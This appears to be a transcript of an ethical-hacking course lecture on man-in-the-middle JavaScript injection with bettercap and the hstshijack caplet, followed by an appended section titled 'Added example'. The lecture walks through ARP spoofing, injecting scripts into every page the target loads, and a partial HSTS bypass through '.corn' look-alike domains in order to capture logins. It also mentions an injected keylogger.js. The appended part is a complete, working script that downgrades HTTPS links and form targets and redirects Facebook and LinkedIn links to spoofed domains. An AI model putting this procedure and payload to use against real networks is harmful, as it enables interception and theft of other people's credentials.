[00:00:00] So far we saw a number of things that we can do once we become the man in the middle. So we saw how we can see anything the target computer does on the network. So we were able to see the websites, the usernames, the passwords, the images, anything they load in their browser. We also saw that since we're the man in the middle we're able to redirect them to other websites. So whenever they request a domain we can redirect them to somewhere else by doing a DNS spoofing attack.

[00:00:33] Another really cool thing that we can do is modify the HTML, modify the pages as they load in the target browser. Obviously this is all possible because we are the man in the middle, because we're able to intercept all this data. So we can wait for the HTML code, which is the code that's responsible for loading web pages, and as it flows through our computer we can insert any piece of code that we want, and the browser will execute this code.

[00:01:05] Now HTML is only responsible for rendering the elements that you see on the web page. So it's responsible for the buttons, for the forms, for the text. It doesn't really allow us to do much, but modern browsers can execute JavaScript code. JavaScript is a powerful programming language that we can use to do so many things. We can actually modify the whole page, remove elements or add elements into the page, we can replace links.
[00:01:37] And this is actually what I did when I modified the HSTS plugin, so I added code that would replace the HTTPS with HTTP, and I also added code that would replace the actual link, the actual domain name, with the spoofed domain name, the one with the .corn or whatever you set it to in the script. You can even use it to hook the browser to other browser exploitation frameworks, which we can use to further exploit the target and even gain full control over their computer. And we'll see that later on in the course, but for now I'm going to show you how to inject a very simple JavaScript code into the loaded pages, and then we'll build up on that in future lectures and see how powerful and useful this can be.

[00:02:27] So right here I have my Kali machine. And before I run bettercap and show you how to inject JavaScript, first of all we need to have some JavaScript code to inject into the target browser. So I'm going to open a text editor and I'm going to write a very very simple JavaScript code. Like I said, we will see how we can use this to run more useful code, but for now we're keeping this simple just to see how we can actually run JavaScript code. So all I'm going to do is alert, open up bracket, quotation mark, and I'm going to say javascript test, I'm going to close the quotation mark and close the bracket and add a semicolon: alert("javascript test");
[00:03:14] So right here, this code, all it's going to do is it's going to display a warning message, an alert message saying javascript code. So since we're going to try to inject this code into all pages, every time we load a web page we should see a message saying javascript test. Now I'm going to save this. So I'm going to go to File, Save, and I'm going to put this in my root directory and I'm just going to call it alert.js. I'm going to hit enter and that is saved now in my root. So if I quit it we can see we have the file right here, so this is the file that contains the code that we want to inject into any web page that loads on the target computer.

[00:04:03] The next step is to go to our HSTS hijack plugin. So as I showed you before, this was in /usr/share/bettercap/caplets/hstshijack. Make sure you use the one that I included in the resources, not the one that comes built in with bettercap, because the built-in one will not work as you want it to. So in here we have the hstshijack.cap file. This is the configuration file for the whole plugin. So I'm going to right click this and open it with my text editor, and in here what we want to modify is the payloads right here. So as you can see in here it's already injecting a JavaScript file called keylogger.js. But we also want to inject our own code.
[00:04:52] So I'm going to add a comma here and I'm going to add a star followed by a colon. We added this star right here to say that I want to inject my script into any page that the target loads. If you want to inject your code into specific domains, then you can remove the star and just list the domains that you want to inject this code in right here. But like I said, we want to inject this into all pages, so I'm going to put this as a star. And after the colon I'm going to put the location of the JavaScript file that I want to inject into the browser. So if we look back in here, this is the file that we just created, which is in root, in my home, and it's called alert.js. So I'm going to put in here, I'm just going to say forward slash root followed by alert.js, so /root/alert.js, and that's it. I'm going to save this, Ctrl+S, and quit it, Ctrl+Q, and we are ready to go.

[00:05:59] So I'm going to go to my terminal. I'm going to run bettercap using the exact same command that we've been using, so we're just giving it the interface as eth0 and we're giving it our spoof file to automatically run the ARP spoofing attack, putting us in the middle of the connection, and as you can see this is working with no errors, so everything is perfect.
[00:06:21] What I also want to do right now is run my HSTS hijack plugin, and as you know all we have to do is just type hs and tab, this will autocomplete. I'm going to hit enter and everything is running with no errors at all. So everything is perfect. And as you can see in here it's saying that the payloads, it's loading the JavaScript payloads, are the keylogger, this is the default one that the file already was loading, and the one that we just specified, which is /root/alert.js. So now any time our target loads any web page, whatever code we put in the alert.js should be injected in the loaded page and it should get executed. The result of that should show us a simple message saying test javascript.

[00:07:13] So let's go to the target. And as usual a good idea is just to remove the browsing data, just to make sure that nothing is cached. And I always like to first test with the simplest case and then move on to more complex scenarios. So first of all I'm going to test it against a normal HTTP page so that there is nothing to bypass, no encryption whatsoever. So we're just going to go to worldwide.com, and perfect, as you can see we have an alert message in here telling us javascript test.
[00:07:47] So basically this means the JavaScript code in my alert.js file got injected into this page. So now that we verified it works against normal HTTP pages, let's go ahead and test it against a page that uses HTTPS, such as stackoverflow.com. Perfect, it's working as expected. Another example would be linkedin.com. Keep in mind these websites use HTTPS, and as you can see we're able to load them with no HTTPS in here, so over HTTP only. So even if you log in right here you'll be able to get the username and the password as shown before.

[00:08:34] Finally let's go and test it against an HSTS website using the partial HSTS bypass method that I showed you. So for that to work we'll need to go to Google first of all, and we need to go to a Google domain that does not use HSTS, similar to google.ie. This is actually the local Google website for Ireland. And as you can see the code works. This is fine, Google only uses HTTPS anyway. But let's look for Facebook. Now we know Facebook uses HSTS, and because HSTS is used we should not be able to inject anything on the website, because the browser will only load it over HTTPS.

[00:09:21] But using our partial bypass method, if I click on Facebook from here, as you can see the code gets executed, because what we're loading right now is facebook.corn, not facebook.com, and as you can see we get a normal Facebook page again that looks identical. And if you log in you'll be able to get the username and the password. So as you can see, this will work against HTTP pages, HTTPS pages and even HSTS, if the target searches for that website, not if they put the domain name in here. So if the target comes in and literally types facebook.com manually and hits enter, the browser will force the HTTPS connection, as you can see in here, because like I said it has a preloaded list of websites that it can only load over HTTPS, and because the browser is establishing an HTTPS connection the data will be encrypted and therefore we won't be able to inject anything in it.
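Added example, not part of the lecture and not the course's alert.js or the modified hstshijack caplet's own code: an injectable payload of the kind the lecture describes near the start, one that rewrites https links to http and swaps an HSTS domain for its spoofed look-alike inside an intercepted page. Assumptions are marked in the comments: the ".corn" spoofed TLD is taken from the lecture, the two-entry domain map is constructed for the example, and the filename /root/rewrite.js and the caplet payloads entry shown in the header comment are hypothetical (the lecture only shows the "*:" followed by a path form for the payloads line).

```javascript
// Added example (not the course's alert.js or the caplet's keylogger.js).
// Rewrites link targets and form actions on an intercepted page:
//   https://www.facebook.com/login  ->  http://www.facebook.corn/login
// Assumptions: ".corn" is the spoofed TLD from the lecture; the domain map
// below is constructed; the file would be registered with a payloads entry
// such as   set hstshijack.payloads *:/root/rewrite.js   (hypothetical path).

// Constructed map of real hostnames -> spoofed look-alikes. Links to these
// HSTS sites get both the domain swap and the downgrade; all other http(s)
// links are only downgraded.
const SPOOF_DOMAINS = {
  "facebook.com": "facebook.corn",
  "linkedin.com": "linkedin.corn",
};

// Rewrite one URL: https -> http, and replace a mapped domain (or any
// subdomain of it, matched on a "." boundary so "notfacebook.com" is left
// alone) with its spoofed counterpart. Relative URLs and non-http(s) schemes
// are returned unchanged: a relative link inherits the scheme of the already
// downgraded page, and mailto:/javascript: links have nothing to rewrite.
function rewriteUrl(href, spoofMap) {
  let u;
  try {
    u = new URL(href); // throws on relative URLs (no base given)
  } catch (e) {
    return href;
  }
  if (u.protocol !== "http:" && u.protocol !== "https:") return href;

  const host = u.hostname.toLowerCase();
  for (const [real, spoofed] of Object.entries(spoofMap)) {
    if (host === real || host.endsWith("." + real)) {
      // keep any subdomain prefix, replace only the registered domain
      u.hostname = host.slice(0, host.length - real.length) + spoofed;
      break;
    }
  }
  u.protocol = "http:"; // the HTTPS -> HTTP downgrade the lecture describes
  return u.href;
}

// Walk the page and rewrite <a href> and <form action> in place.
// Returns how many attributes changed, so a caller can tell whether the
// injected script actually touched anything on this page.
function rewriteDocumentLinks(doc, spoofMap) {
  let changed = 0;
  const targets = [
    ["a[href]", "href"],
    ["form[action]", "action"],
  ];
  for (const [selector, attr] of targets) {
    for (const el of doc.querySelectorAll(selector)) {
      const before = el.getAttribute(attr);
      const after = rewriteUrl(before, spoofMap);
      if (after !== before) {
        el.setAttribute(attr, after);
        changed++;
      }
    }
  }
  return changed;
}

// When injected into a real browser: rewrite what is on the page now, then
// keep rewriting as scripts add links later (many sites build menus and
// login forms after the initial load).
if (typeof document !== "undefined" && typeof MutationObserver !== "undefined") {
  rewriteDocumentLinks(document, SPOOF_DOMAINS);
  new MutationObserver(() => rewriteDocumentLinks(document, SPOOF_DOMAINS))
    .observe(document.documentElement, { childList: true, subtree: true });
}
```

As the lecture's last paragraph explains, this only works on links inside a page that was already intercepted; if the victim types facebook.com directly, the browser's preloaded HSTS list forces HTTPS before any request leaves the machine, and the script never gets a chance to run.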